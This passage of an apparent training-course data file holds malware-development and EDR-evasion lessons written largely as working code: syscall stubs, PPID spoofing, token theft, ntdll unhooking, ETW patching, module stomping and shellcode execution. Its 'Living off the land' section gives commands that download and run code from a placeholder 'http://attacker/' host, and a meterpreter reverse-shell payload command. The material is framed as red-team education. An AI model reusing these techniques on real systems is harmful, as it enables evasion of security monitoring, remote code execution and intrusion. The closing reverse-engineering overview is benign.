      { heading: "Reflective DLL loading", content: `Load a DLL from memory without touching disk or using LoadLibrary:\n\n\`\`\`c\n// Reflective loading steps:\n// 1. Parse PE headers from in-memory buffer\n// 2. Allocate memory at preferred base (or relocate)\n// 3. Copy sections to correct virtual addresses\n// 4. Process relocations (if base differs from preferred)\n// 5. Resolve imports (walk IAT, call GetProcAddress)\n// 6. Call TLS callbacks\n// 7. Call DllMain(DLL_PROCESS_ATTACH)\n\n// This avoids:\n// - File on disk (no AV file scan)\n// - LoadLibrary API call (no API monitoring trigger)\n// - Entry in PEB.Ldr module list (hidden from process module enumeration)\n\`\`\`\n\nTools that implement this: Cobalt Strike's Beacon DLL, Stephen Fewer's ReflectiveDLLInjection, sRDI (shellcode Reflective DLL Injection).`, sortOrder: 2 },
      { heading: "Sources", content: `- Stephen Fewer, "Reflective DLL Injection" (Harmony Security)\n- ired.team/offensive-security/code-injection-process-injection/process-hollowing\n- Cobalt Strike documentation (C2 design)\n- MITRE ATT&CK T1055 (Process Injection sub-techniques)`, sortOrder: 3 },
    ],
  },
  {
    competencyId: "maldev-techniques", depthTier: 4, title: "Expert Malware Techniques", recommendedLevel: 4,
    sections: [
      { heading: "Direct syscalls", content: `Bypass user-mode hooks by calling the kernel directly:\n\n\`\`\`nasm\n; Direct syscall stub (NtAllocateVirtualMemory)\n; Syscall number must be resolved at runtime\nNtAllocateVirtualMemory:\n    mov r10, rcx\n    mov eax, <syscall_number>  ; varies by Windows version\n    syscall\n    ret\n\`\`\`\n\n\`\`\`c\n// Hell's Gate: resolve syscall numbers dynamically\n// Walk ntdll exports, find Zw* functions\n// Each starts with: mov r10, rcx; mov eax, <number>; ...; syscall\n// Extract the number from the function bytes\n\ntypedef struct {\n    WORD wSyscall;  // syscall number\n} GATE;\n\nBOOL GetGate(GATE* gate, PVOID funcAddr) {\n    // Check for: 4C 8B D1 (mov r10, rcx)\n    //            B8 XX XX 00 00 (mov eax, syscall_number)\n    PBYTE ptr = (PBYTE)funcAddr;\n    if (ptr[0] == 0x4C && ptr[1] == 0x8B && ptr[2] == 0xD1\n        && ptr[3] == 0xB8) {\n        gate->wSyscall = *(WORD*)(ptr + 4);\n        return TRUE;\n    }\n    return FALSE;  // function is hooked, try neighbor\n}\n\`\`\`\n\nVariants: Hell's Gate, Halo's Gate (handles hooked functions by checking neighbors), Tartarus' Gate, SysWhispers (generates syscall stubs at compile time).`, sortOrder: 0 },
      { heading: "PPID spoofing and token manipulation", content: `\`\`\`c\n// PPID spoofing — make a process appear as child of another process\n// (e.g., make malware look like it was spawned by explorer.exe)\n\nSIZE_T attrSize;\nInitializeProcThreadAttributeList(NULL, 1, 0, &attrSize);\nLPPROC_THREAD_ATTRIBUTE_LIST attrList = HeapAlloc(GetProcessHeap(),\n                                                   0, attrSize);\nInitializeProcThreadAttributeList(attrList, 1, 0, &attrSize);\n\nHANDLE hParent = OpenProcess(PROCESS_CREATE_PROCESS, FALSE, explorerPid);\nUpdateProcThreadAttribute(attrList, 0,\n    PROC_THREAD_ATTRIBUTE_PARENT_PROCESS,\n    &hParent, sizeof(HANDLE), NULL, NULL);\n\nSTARTUPINFOEXA si = { .StartupInfo.cb = sizeof(si) };\nsi.lpAttributeList = attrList;\nCreateProcessA(NULL, "cmd.exe", NULL, NULL, FALSE,\n               EXTENDED_STARTUPINFO_PRESENT | CREATE_NO_WINDOW,\n               NULL, NULL, &si.StartupInfo, &pi);\n\`\`\`\n\n\`\`\`c\n// Token impersonation — steal another user's security context\nHANDLE hToken, hDupToken;\nOpenProcessToken(hTargetProcess, TOKEN_DUPLICATE | TOKEN_QUERY, &hToken);\nDuplicateTokenEx(hToken, MAXIMUM_ALLOWED, NULL,\n                 SecurityImpersonation, TokenPrimary, &hDupToken);\nCreateProcessWithTokenW(hDupToken, LOGON_WITH_PROFILE,\n                        NULL, L"cmd.exe", 0, NULL, NULL, &si, &pi);\n\`\`\``, sortOrder: 1 },
      { heading: "In-memory .NET execution", content: `Execute .NET assemblies without touching disk:\n\n\`\`\`c\n// Unmanaged CLR hosting — load .NET runtime from C/C++\n#include <metahost.h>\n\nICLRMetaHost* pMetaHost;\nICLRRuntimeInfo* pRuntimeInfo;\nICLRRuntimeHost* pRuntimeHost;\n\nCLRCreateInstance(CLSID_CLRMetaHost, IID_ICLRMetaHost,\n                  (LPVOID*)&pMetaHost);\npMetaHost->GetRuntime(L"v4.0.30319", IID_ICLRRuntimeInfo,\n                      (LPVOID*)&pRuntimeInfo);\npRuntimeInfo->GetInterface(CLSID_CLRRuntimeHost,\n                           IID_ICLRRuntimeHost,\n                           (LPVOID*)&pRuntimeHost);\npRuntimeHost->Start();\n\nDWORD result;\npRuntimeHost->ExecuteInDefaultAppDomain(\n    L"C:\\\\payload.exe",  // or from memory using Assembly.Load\n    L"Namespace.Class",\n    L"MethodName",\n    L"argument",\n    &result);\n\`\`\`\n\nIn-memory variant: read assembly bytes, use ICLRRuntimeHost2 or AppDomain.Load to execute from a byte array — no file on disk.`, sortOrder: 2 },
      { heading: "Sources", content: `- am0nsec & RtlMateusz, "Hell's Gate" (paper)\n- SysWhispers: github.com/jthuraisamy/SysWhispers\n- Casey Smith, "DotNetToJScript"\n- MSDN: ICLRMetaHost interface\n- ired.team/offensive-security`, sortOrder: 3 },
    ],
  },
  {
    competencyId: "maldev-techniques", depthTier: 5, title: "Malware Internals", recommendedLevel: 5,
    sections: [
      { heading: "Custom PE loader", content: `Building a PE loader from scratch teaches the deepest level of Windows internals:\n\n\`\`\`c\n// Manual PE mapping steps:\n\n// 1. Parse DOS/NT headers\nPIMAGE_DOS_HEADER dos = (PIMAGE_DOS_HEADER)peBuffer;\nPIMAGE_NT_HEADERS nt = (PIMAGE_NT_HEADERS)(peBuffer + dos->e_lfanew);\n\n// 2. Allocate memory at preferred base\nLPVOID base = VirtualAlloc(\n    (LPVOID)nt->OptionalHeader.ImageBase,\n    nt->OptionalHeader.SizeOfImage,\n    MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);\n\n// 3. Copy headers\nmemcpy(base, peBuffer, nt->OptionalHeader.SizeOfHeaders);\n\n// 4. Copy sections to virtual addresses\nPIMAGE_SECTION_HEADER sec = IMAGE_FIRST_SECTION(nt);\nfor (int i = 0; i < nt->FileHeader.NumberOfSections; i++) {\n    memcpy((BYTE*)base + sec[i].VirtualAddress,\n           peBuffer + sec[i].PointerToRawData,\n           sec[i].SizeOfRawData);\n}\n\n// 5. Process relocations (if base != preferred)\nDWORD delta = (DWORD)((BYTE*)base - nt->OptionalHeader.ImageBase);\n// Walk relocation table, add delta to each entry\n\n// 6. Resolve imports\n// Walk IAT, resolve each function with GetProcAddress\n\n// 7. Set section permissions (.text→RX, .data→RW, .rdata→R)\n\n// 8. Call entry point\ntypedef BOOL (WINAPI *DllMain_t)(HINSTANCE, DWORD, LPVOID);\nDllMain_t entry = (DllMain_t)((BYTE*)base +\n                  nt->OptionalHeader.AddressOfEntryPoint);\nentry((HINSTANCE)base, DLL_PROCESS_ATTACH, NULL);\n\`\`\``, sortOrder: 0 },
      { heading: "Position-independent code design", content: `Shellcode must work at any memory address — no fixed references:\n\n\`\`\`nasm\n; Position-independent technique: RIP-relative addressing (x86-64)\nlea rbx, [rip]       ; get current address\n; All data references relative to rbx\n\n; Find kernel32.dll base address via PEB\n; PEB is at GS:[0x60] (64-bit) or FS:[0x30] (32-bit)\nmov rax, gs:[0x60]    ; PEB\nmov rax, [rax+0x18]   ; PEB->Ldr\nmov rax, [rax+0x20]   ; InMemoryOrderModuleList\nmov rax, [rax]        ; second entry (ntdll.dll)\nmov rax, [rax]        ; third entry (kernel32.dll)\nmov rax, [rax+0x20]   ; DllBase (kernel32 base address)\n\n; Walk export table to find GetProcAddress\n; Then use GetProcAddress to resolve everything else\n\`\`\`\n\n\`\`\`c\n// Compile C to shellcode:\n// 1. Write position-independent C (no global variables, no string literals)\n// 2. Compile: cl.exe /O1 /GS- source.c /link /ENTRY:main /NODEFAULTLIB\n// 3. Extract .text section: objcopy -O binary -j .text\n// Or use tools like Donut (converts PE to shellcode)\n\`\`\``, sortOrder: 1 },
      { heading: "Kernel-mode techniques", content: `Kernel drivers provide the highest privilege level:\n\n\`\`\`c\n// Minimal kernel driver\n#include <ntddk.h>\n\nvoid DriverUnload(PDRIVER_OBJECT DriverObject) {\n    DbgPrint("Driver unloaded\\n");\n}\n\nNTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject,\n                     PUNICODE_STRING RegistryPath) {\n    DriverObject->DriverUnload = DriverUnload;\n\n    // From kernel mode, you can:\n    // - Read/write any process memory (MmCopyVirtualMemory)\n    // - Modify kernel structures (EPROCESS, DKOM)\n    // - Register callbacks (process, thread, image load)\n    // - Hook system calls (though PatchGuard detects this)\n    // - Access hardware directly\n\n    DbgPrint("Driver loaded\\n");\n    return STATUS_SUCCESS;\n}\n\`\`\`\n\nBYOVD (Bring Your Own Vulnerable Driver): Load a legitimately signed but vulnerable driver, then exploit it to execute arbitrary kernel code. This bypasses driver signing enforcement since the driver has a valid signature.`, sortOrder: 2 },
      { heading: "Sources", content: `- Donut: github.com/TheWover/donut (PE to shellcode)\n- sRDI: github.com/monoxgas/sRDI (shellcode reflective DLL injection)\n- Windows Driver Kit documentation\n- LOLDrivers: loldrivers.io (vulnerable driver database)\n- Pavel Yosifovich, "Windows Kernel Programming"`, sortOrder: 3 },
    ],
  },

  // ── evasion L0-L5 ───────────────────────────────────────────────────────
  {
    competencyId: "evasion", depthTier: 0, title: "Evasion Techniques Overview", recommendedLevel: 0,
    sections: [
      { heading: "What is evasion", content: `Evasion refers to techniques used to avoid detection by security tools during authorized penetration testing and red team engagements. Understanding evasion is crucial for both attackers (to test defenses) and defenders (to improve detection).\n\nSecurity tools that evasion targets:\n- **Antivirus (AV)**: Signature-based and heuristic detection\n- **Endpoint Detection and Response (EDR)**: Behavioral analysis, API monitoring\n- **Network monitoring**: IDS/IPS, firewall, proxy inspection\n- **Application whitelisting**: Restricts which programs can execute`, sortOrder: 0 },
      { heading: "Detection methods", content: `Understanding what detects you helps you evade it:\n\n| Method | How it works | Weakness |\n|--------|-------------|----------|\n| Signature-based | Matches known malware byte patterns | Obfuscation, encryption |\n| Heuristic | Rules for suspicious behavior patterns | Living-off-the-land |\n| Behavioral | Monitors API calls and system changes | Delayed execution, indirect calls |\n| ML/AI-based | Statistical models trained on malware features | Adversarial inputs |\n| Sandboxing | Executes in isolated environment | Sandbox detection, delayed execution |\n| AMSI | Scans scripts before execution (.NET, PS, JS) | AMSI bypass, obfuscation |`, sortOrder: 1 },
      { heading: "Sources", content: `- MITRE ATT&CK: Defense Evasion (TA0005)\n- Elastic Security blog (detection engineering)\n- AMSI documentation: learn.microsoft.com/en-us/windows/win32/amsi`, sortOrder: 2 },
    ],
  },
  {
    competencyId: "evasion", depthTier: 1, title: "Evasion Basics", recommendedLevel: 1,
    sections: [
      { heading: "Basic obfuscation", content: `\`\`\`python\n# XOR encoding (simplest obfuscation)\ndef xor_encode(data, key):\n    return bytes([b ^ key[i % len(key)] for i, b in enumerate(data)])\n\nshellcode = b"\\xfc\\x48\\x83..."  # raw shellcode\nkey = b"secretkey"\nencoded = xor_encode(shellcode, key)\n\n# At runtime: decode and execute\ndecoded = xor_encode(encoded, key)\n\`\`\`\n\n\`\`\`c\n// Compile-time string encryption\n// Instead of: char cmd[] = "powershell.exe";\n// Use XOR-encrypted strings that decrypt at runtime\nunsigned char enc_cmd[] = {0x60, 0x5f, 0x63, ...};  // XOR'd\nfor (int i = 0; i < sizeof(enc_cmd); i++)\n    enc_cmd[i] ^= 0x41;  // decrypt\n// Now enc_cmd = "powershell.exe"\n\`\`\`\n\nBasic obfuscation defeats signature-based detection but not behavioral analysis. The decryption routine itself can become a signature.`, sortOrder: 0 },
      { heading: "Living off the land", content: `Use legitimate Windows tools (LOLBins) to avoid dropping custom executables:\n\n\`\`\`powershell\n# Execute remote script without touching disk\npowershell -ep bypass -nop -w hidden -c \"IEX(New-Object Net.WebClient).DownloadString('http://attacker/script.ps1')\"\n\n# MSHTA — execute HTA (HTML Application)\nmshta http://attacker/payload.hta\n\n# Certutil — download files\ncertutil -urlcache -split -f http://attacker/payload.exe C:\\temp\\update.exe\n\n# Regsvr32 — execute scriptlets\nregsvr32 /s /n /u /i:http://attacker/file.sct scrobj.dll\n\n# WMIC — process creation\nwmic process call create \"cmd /c whoami > C:\\temp\\output.txt\"\n\n# MSBuild — execute C# from XML\nmsbuild.exe payload.xml\n\`\`\`\n\nReference: LOLBAS Project (lolbas-project.github.io) — comprehensive catalog of Windows binaries usable for living-off-the-land.`, sortOrder: 1 },
      { heading: "Payload encoding", content: `\`\`\`bash\n# msfvenom with encoders\nmsfvenom -p windows/x64/meterpreter/reverse_tcp \\\\\n  LHOST=10.10.14.1 LPORT=443 \\\\\n  -e x64/xor_dynamic -i 5 \\\\\n  -f exe -o payload.exe\n\n# Custom encoding: AES encryption\n# 1. Generate payload\nmsfvenom -p windows/x64/meterpreter/reverse_tcp ... -f raw -o payload.bin\n\n# 2. Encrypt with Python\nfrom Crypto.Cipher import AES\nkey = b\"sixteen_byte_key\"\ncipher = AES.new(key, AES.MODE_CBC, iv)\nencrypted = cipher.encrypt(pad(shellcode, AES.block_size))\n\n# 3. Loader decrypts at runtime before executing\n\`\`\`\n\nAES encryption is much stronger than XOR — AV can't decrypt without the key, so signature scanning on the encrypted payload is useless.`, sortOrder: 2 },
      { heading: "Sources", content: `- LOLBAS Project: lolbas-project.github.io\n- GTFOBins (Linux equivalent): gtfobins.github.io\n- MITRE ATT&CK T1218 (System Binary Proxy Execution)\n- msfvenom documentation`, sortOrder: 3 },
    ],
  },
  {
    competencyId: "evasion", depthTier: 2, title: "Evasion in Depth", recommendedLevel: 2,
    sections: [
      { heading: "AMSI bypass techniques", content: `AMSI (Antimalware Scan Interface) scans scripts before execution:\n\n\`\`\`powershell\n# AMSI scans: PowerShell, VBScript, JScript, .NET assemblies\n# When you type: IEX (New-Object Net.WebClient).DownloadString('...')\n# AMSI sends the downloaded content to the AV engine before execution\n\n# Bypass concept: patch the AmsiScanBuffer function in memory\n# The function returns AMSI_RESULT_CLEAN instead of actually scanning\n\n# Simple test — this string triggers AMSI:\n# \"Invoke-Mimikatz\" → AMSI blocks it\n# After bypass: runs without detection\n\`\`\`\n\nBypass approaches:\n- **Memory patching**: Modify AmsiScanBuffer to return clean result\n- **Reflection**: Use .NET reflection to set amsiInitFailed = true\n- **String obfuscation**: Break trigger strings: \`"Inv" + "oke-Mim" + "ikatz"\`\n- **Base64 + IEX**: Encode the entire script\n\nNote: Specific bypass code is frequently signatured — the concept matters more than any one implementation.`, sortOrder: 0 },
      { heading: "Sandbox evasion", content: `Detect and evade automated analysis sandboxes:\n\n\`\`\`c\n// Environment checks\nBOOL isSandbox() {\n    // Check for VM artifacts\n    HKEY hKey;\n    if (RegOpenKeyExA(HKEY_LOCAL_MACHINE,\n        "SOFTWARE\\\\VMware, Inc.\\\\VMware Tools", 0,\n        KEY_READ, &hKey) == ERROR_SUCCESS) {\n        RegCloseKey(hKey);\n        return TRUE;  // VMware detected\n    }\n\n    // Check CPU count (sandboxes often have 1-2)\n    SYSTEM_INFO si;\n    GetSystemInfo(&si);\n    if (si.dwNumberOfProcessors < 2) return TRUE;\n\n    // Check RAM (sandboxes often have < 4GB)\n    MEMORYSTATUSEX ms = { .dwLength = sizeof(ms) };\n    GlobalMemoryStatusEx(&ms);\n    if (ms.ullTotalPhys < 4ULL * 1024 * 1024 * 1024) return TRUE;\n\n    // Check for common analysis tools\n    if (FindWindowA(NULL, "x64dbg\")) return TRUE;\n    if (FindWindowA(NULL, \"Process Monitor\")) return TRUE;\n\n    // Time-based: sleep and check if time actually passed\n    DWORD t1 = GetTickCount();\n    Sleep(10000);  // 10 seconds\n    DWORD t2 = GetTickCount();\n    if (t2 - t1 < 9000) return TRUE;  // sandbox fast-forwarded sleep\n\n    return FALSE;\n}\n\`\`\``, sortOrder: 1 },
      { heading: "API hashing", content: `Hide API calls from static analysis by resolving them at runtime:\n\n\`\`\`c\n// Instead of calling VirtualAlloc directly (visible in import table),\n// resolve it by hash at runtime\n\n// djb2 hash function\nDWORD hash(const char* str) {\n    DWORD h = 5381;\n    while (*str)\n        h = ((h << 5) + h) + *str++;\n    return h;\n}\n\n// Walk PEB → InMemoryOrderModuleList → find kernel32\n// Walk kernel32 export table\n// Hash each export name, compare with target hash\n// When match found: cast to function pointer and call\n\ntypedef LPVOID (WINAPI *VirtualAlloc_t)(LPVOID, SIZE_T, DWORD, DWORD);\nVirtualAlloc_t pVirtualAlloc =\n    (VirtualAlloc_t)resolve_api(kernel32_base, 0xABCD1234);\nLPVOID mem = pVirtualAlloc(NULL, size, MEM_COMMIT, PAGE_RW);\n\`\`\`\n\nResult: the import table shows no suspicious APIs. Static analysis tools see only the hash constants — the actual function names are never present in the binary.`, sortOrder: 2 },
      { heading: "Sources", content: `- AMSI documentation: learn.microsoft.com/en-us/windows/win32/amsi\n- Al-Khaser: github.com/LordNoteworthy/al-khaser (anti-analysis techniques)\n- MITRE ATT&CK T1027 (Obfuscated Files or Information)\n- MITRE ATT&CK T1497 (Virtualization/Sandbox Evasion)`, sortOrder: 3 },
    ],
  },
  {
    competencyId: "evasion", depthTier: 3, title: "Advanced Evasion Techniques", recommendedLevel: 3,
    sections: [
      { heading: "Unhooking ntdll", content: `EDR products inline-hook ntdll.dll functions. Restore the original bytes:\n\n\`\`\`c\n// Technique: Load a fresh copy of ntdll from disk\n// The on-disk copy is not hooked\n\nHANDLE hFile = CreateFileA(\"C:\\\\Windows\\\\System32\\\\ntdll.dll\",\n    GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);\nHANDLE hMapping = CreateFileMapping(hFile, NULL, PAGE_READONLY,\n    0, 0, NULL);\nLPVOID cleanNtdll = MapViewOfFile(hMapping, FILE_MAP_READ,\n    0, 0, 0);\n\n// Get the .text section from the clean copy\nPIMAGE_DOS_HEADER dos = (PIMAGE_DOS_HEADER)cleanNtdll;\nPIMAGE_NT_HEADERS nt = (PIMAGE_NT_HEADERS)(\n    (BYTE*)cleanNtdll + dos->e_lfanew);\nPIMAGE_SECTION_HEADER sec = IMAGE_FIRST_SECTION(nt);\n// Find .text section and copy over the hooked version\n\nHMODULE hNtdll = GetModuleHandleA(\"ntdll.dll\");\nDWORD old;\nVirtualProtect(\n    (BYTE*)hNtdll + sec->VirtualAddress,\n    sec->Misc.VirtualSize,\n    PAGE_EXECUTE_READWRITE, &old);\nmemcpy(\n    (BYTE*)hNtdll + sec->VirtualAddress,\n    (BYTE*)cleanNtdll + sec->PointerToRawData,\n    sec->SizeOfRawData);\nVirtualProtect(\n    (BYTE*)hNtdll + sec->VirtualAddress,\n    sec->Misc.VirtualSize,\n    old, &old);\n\n// Now all ntdll functions are unhooked\n\`\`\`\n\nVariants: read ntdll from \\KnownDlls\\ntdll.dll (Section object), read from suspended process, use direct syscalls instead of unhooking.`, sortOrder: 0 },
      { heading: "Sleep obfuscation", content: `During Sleep() calls, implant memory is scannable. Encrypt it while sleeping:\n\n\`\`\`c\n// Concept: before sleeping, encrypt the implant's memory\n// Use a timer or APC to decrypt when waking up\n\n// 1. Register a timer callback\n// 2. In the callback:\n//    a. Make memory RW (VirtualProtect)\n//    b. Decrypt (SystemFunction032 — RC4)\n//    c. Make memory RX\n//    d. Resume execution\n// 3. Before sleeping:\n//    a. Encrypt memory\n//    b. Make memory RW (looks like data, not code)\n//    c. Sleep\n//    d. Timer fires → callback decrypts → continue\n\n// Implementations:\n// - Ekko: Timer-based sleep obfuscation\n// - Foliage: APC-based\n// - DeathSleep: Thread pool timers\n\`\`\`\n\nThis defeats memory scanners that look for known implant signatures in process memory during idle periods.`, sortOrder: 1 },
      { heading: "ETW patching", content: `ETW (Event Tracing for Windows) feeds telemetry to EDR. Disable it:\n\n\`\`\`c\n// Patch EtwEventWrite to return immediately\n// This silences all ETW events from the current process\n\nHMODULE hNtdll = GetModuleHandleA(\"ntdll.dll\");\nFARPROC pEtwEventWrite = GetProcAddress(hNtdll, \"EtwEventWrite\");\n\n// Patch: xor eax, eax; ret (return 0 = success)\nunsigned char patch[] = { 0x48, 0x33, 0xC0, 0xC3 };\n\nDWORD old;\nVirtualProtect(pEtwEventWrite, sizeof(patch),\n               PAGE_EXECUTE_READWRITE, &old);\nmemcpy(pEtwEventWrite, patch, sizeof(patch));\nVirtualProtect(pEtwEventWrite, sizeof(patch), old, &old);\n\n// Now .NET assembly loading, PowerShell execution, etc.\n// generate no ETW events in this process\n\`\`\`\n\nNote: Kernel-level ETW (Microsoft-Windows-Threat-Intelligence provider) cannot be patched from user mode — it's protected by PPL.`, sortOrder: 2 },
      { heading: "Sources", content: `- MDSec: "Bypassing User-Mode Hooks and Direct Invocation of System Calls"\n- Ekko: github.com/Cracked5pider/Ekko (sleep obfuscation)\n- ired.team/offensive-security/defense-evasion\n- Elastic Security: EDR telemetry research`, sortOrder: 3 },
    ],
  },
  {
    competencyId: "evasion", depthTier: 4, title: "Expert Evasion Techniques", recommendedLevel: 4,
    sections: [
      { heading: "Callback-based execution", content: `Avoid CreateThread/CreateRemoteThread — use legitimate callback mechanisms:\n\n\`\`\`c\n// Thread Pool execution (via TpAllocWork)\ntypedef NTSTATUS(NTAPI* TpAllocWork_t)(PTP_WORK*, PTP_WORK_CALLBACK,\n                                        PVOID, PTP_CALLBACK_ENVIRON);\nTpAllocWork_t pTpAllocWork = (TpAllocWork_t)GetProcAddress(\n    GetModuleHandleA(\"ntdll\"), \"TpAllocWork\");\n\nPTP_WORK work;\npTpAllocWork(&work, (PTP_WORK_CALLBACK)shellcodeAddr, NULL, NULL);\nTpPostWork(work);\nTpReleaseWork(work);\nWaitForSingleObject(GetCurrentThread(), INFINITE);\n\n// Fibers — cooperative threading, less monitored than threads\nLPVOID mainFiber = ConvertThreadToFiber(NULL);\nLPVOID shellFiber = CreateFiber(0, (LPFIBER_START_ROUTINE)shellcode, NULL);\nSwitchToFiber(shellFiber);  // execute shellcode\nSwitchToFiber(mainFiber);   // return\n\n// APC injection — queue shellcode as an Asynchronous Procedure Call\nQueueUserAPC((PAPCFUNC)shellcodeAddr, hThread, 0);\n// Thread must be in alertable wait state (SleepEx, WaitForSingleObjectEx)\n\`\`\`\n\nThese execution methods are less commonly monitored by EDR compared to CreateThread-family APIs.`, sortOrder: 0 },
      { heading: "Module stomping and phantom DLL loading", content: `Execute code from legitimate DLL memory:\n\n\`\`\`c\n// Module stomping: load a legitimate DLL, overwrite its .text with shellcode\n// Result: shellcode executes from a signed DLL's memory region\n\n// 1. Load a benign DLL\nHMODULE hModule = LoadLibraryA(\"amsi.dll\");  // any DLL will do\n\n// 2. Find its .text section\nPIMAGE_DOS_HEADER dos = (PIMAGE_DOS_HEADER)hModule;\nPIMAGE_NT_HEADERS nt = (PIMAGE_NT_HEADERS)(\n    (BYTE*)hModule + dos->e_lfanew);\nPIMAGE_SECTION_HEADER text = IMAGE_FIRST_SECTION(nt);\nLPVOID textAddr = (BYTE*)hModule + text->VirtualAddress;\n\n// 3. Make writable, copy shellcode, restore to RX\nDWORD old;\nVirtualProtect(textAddr, text->Misc.VirtualSize,\n               PAGE_READWRITE, &old);\nmemcpy(textAddr, shellcode, shellcodeSize);\nVirtualProtect(textAddr, text->Misc.VirtualSize,\n               PAGE_EXECUTE_READ, &old);\n\n// 4. Execute — memory scanner sees code in amsi.dll region\n// Backed by a signed, legitimate module\n((void(*)())textAddr)();\n\`\`\`\n\nPhantom DLL hollowing: load DLL with SEC_IMAGE, creating a valid section mapping, then overwrite with payload. Memory scanners see a file-backed executable region.`, sortOrder: 1 },
      { heading: "Indirect syscalls and call stack spoofing", content: `Direct syscalls have a telltale sign: the syscall instruction originates from non-ntdll memory. Indirect syscalls fix this:\n\n\`\`\`nasm\n; Direct syscall (detectable — RIP not in ntdll)\nmov r10, rcx\nmov eax, syscall_number\nsyscall           ; ← this instruction is in our module\nret\n\n; Indirect syscall (stealthier — jumps to ntdll's syscall instruction)\nmov r10, rcx\nmov eax, syscall_number\njmp [ntdll_syscall_addr]  ; jump to the actual syscall;ret in ntdll\n; The syscall instruction executes from ntdll's address range\n\`\`\`\n\n**Call stack spoofing**: EDR inspects call stacks. A syscall originating from unbacked memory is suspicious. Solutions:\n- Spoof return addresses on the stack to point to legitimate code\n- Use frame pointer manipulation to construct a plausible call chain\n- Execute from fiber/thread pool callbacks (legitimate call stacks)\n\nTools: SilentMoonwalk, Unwinder, CallStackSpoofer.`, sortOrder: 2 },
      { heading: "Sources", content: `- SilentMoonwalk: github.com/klezVirus/SilentMoonwalk\n- MDSec research blog (module stomping, phantom DLL hollowing)\n- SysWhispers3: github.com/klezVirus/SysWhispers3 (indirect syscalls)\n- Elastic: "Hunting for Call Stack Anomalies"`, sortOrder: 3 },
    ],
  },
  {
    competencyId: "evasion", depthTier: 5, title: "Evasion Internals", recommendedLevel: 5,
    sections: [
      { heading: "Hypervisor-level evasion", content: `The most advanced evasion operates below the OS:\n\n**Hypervisor rootkits**: A thin hypervisor sits between the hardware and the OS. The OS runs in a VM guest and doesn't know it's virtualized:\n- Intercept and modify any system call, memory access, or I/O operation\n- Invisible to all OS-level security tools (they run as guests)\n- Blue Pill (concept), SubVirt (Microsoft/UMich research)\n\n**Hardware-assisted virtualization evasion**:\n- Use VT-x/AMD-V to create a hypervisor that intercepts EPT (Extended Page Table) violations\n- Monitor and modify page table entries to hide memory\n- Intercept VMCALL instructions for communication\n\n\`\`\`\nNormal execution:\n  Application → Kernel → Hardware\n\nHypervisor rootkit:\n  Application → Kernel → Hypervisor → Hardware\n  (Kernel doesn't know about the hypervisor layer)\n\`\`\`\n\nDefense: Secure Boot chain of trust, firmware measurements (TPM), hypervisor integrity verification (VBS), hardware security modules that can't be virtualized.`, sortOrder: 0 },
      { heading: "EDR architecture and blind spots", content: `Understanding how EDR products work reveals their limitations:\n\n\`\`\`\nEDR architecture:\n\n  User Mode:\n    ├── EDR DLL (injected into every process)\n    │   └── Hooks ntdll.dll functions (inline patches)\n    ├── EDR Service (collects telemetry)\n    │   └── Receives events, sends to cloud, applies rules\n    └── AMSI Provider (scans scripts)\n\n  Kernel Mode:\n    ├── Minifilter driver (file system monitoring)\n    ├── Network filter driver (connection monitoring)\n    ├── Callback registrations:\n    │   ├── PsSetCreateProcessNotifyRoutine\n    │   ├── PsSetCreateThreadNotifyRoutine\n    │   ├── PsSetLoadImageNotifyRoutine\n    │   ├── ObRegisterCallbacks\n    │   └── CmRegisterCallbackEx\n    └── ETW consumer (Microsoft-Windows-Threat-Intelligence)\n\`\`\`\n\nBlind spots:\n- **Direct syscalls**: Bypass user-mode hooks entirely\n- **Hardware breakpoints**: Replace inline hooks with debug register monitoring (detected by some EDRs)\n- **Kernel callback removal**: Driver-level attack removes notification callbacks\n- **Early execution**: Code running before EDR DLL is loaded is unmonitored\n- **WoW64 transitions**: Some EDRs have gaps in 32-bit ↔ 64-bit transition monitoring`, sortOrder: 1 },
      { heading: "Research frontiers", content: `Cutting-edge evasion research areas:\n\n- **ROP-based evasion**: Entire payload as ROP chain — no executable shellcode, only returns into existing code\n- **Hardware transactional memory (HTM)**: Use Intel TSX to detect breakpoints and hooks (transaction aborts if monitored memory is accessed)\n- **Speculative execution**: Side-channel techniques for information gathering without triggering security monitors\n- **AI/ML adversarial attacks**: Generate binaries that fool ML-based classifiers (adversarial examples for PE classification models)\n- **Firmware implants**: Persist below the OS in UEFI firmware — survives OS reinstallation and disk formatting\n\nThe cat-and-mouse game continues: each new evasion technique eventually gets detected, driving both offensive and defensive innovation.`, sortOrder: 2 },
      { heading: "Sources", content: `- Joanna Rutkowska, "Subverting Vista Kernel" / "Blue Pill" (2006)\n- Intel SDM: Chapter on VMX (VT-x)\n- Elastic: EDR internals research series\n- LOLDrivers: loldrivers.io (BYOVD catalog)\n- BlackHat/DEF CON proceedings (annual evasion research)`, sortOrder: 3 },
    ],
  },

  // ── reverse-engineering L0-L5 ───────────────────────────────────────────
  {
    competencyId: "reverse-engineering", depthTier: 0, title: "Reverse Engineering Overview", recommendedLevel: 0,
    sections: [
      { heading: "What is reverse engineering", content: `Reverse engineering is the process of analyzing compiled software to understand how it works without access to the source code. In cybersecurity, it's used for malware analysis, vulnerability research, CTF challenges, and understanding proprietary protocols.\n\nTwo main approaches:\n- **Static analysis**: Examine the binary without executing it (disassembly, decompilation)\n- **Dynamic analysis**: Run the binary and observe its behavior (debugging, tracing, sandboxing)`, sortOrder: 0 },
      { heading: "Key vocabulary", content: `- **Disassembly**: Machine code → assembly language\n- **Decompilation**: Machine code → approximate source code (C-like)\n- **Debugger**: Tool for stepping through execution (GDB, x64dbg, WinDbg)\n- **Breakpoint**: Pause execution at a specific address or condition\n- **Symbol**: Named reference (function name, variable name) — stripped binaries have none\n- **IDA**: Interactive Disassembler — industry standard (commercial)\n- **Ghidra**: NSA's free disassembler/decompiler\n- **Stripped binary**: Debug symbols removed — harder to analyze\n- **Packing**: Compressing/encrypting the binary (UPX, Themida)\n- **Anti-debug**: Techniques to detect or prevent debugging`, sortOrder: 1 },
      { heading: "Sources", content: `- Dennis Yurichev, "Reverse Engineering for Beginners" (free book)\n- Ghidra: ghidra-sre.org\n- crackmes.one (practice binaries)\n- Malware Unicorn's RE101 (free course)`, sortOrder: 2 },
    ],
  },
  {
    competencyId: "reverse-engineering", depthTier: 1, title: "Reverse Engineering Basics", recommendedLevel: 1,
    sections: [
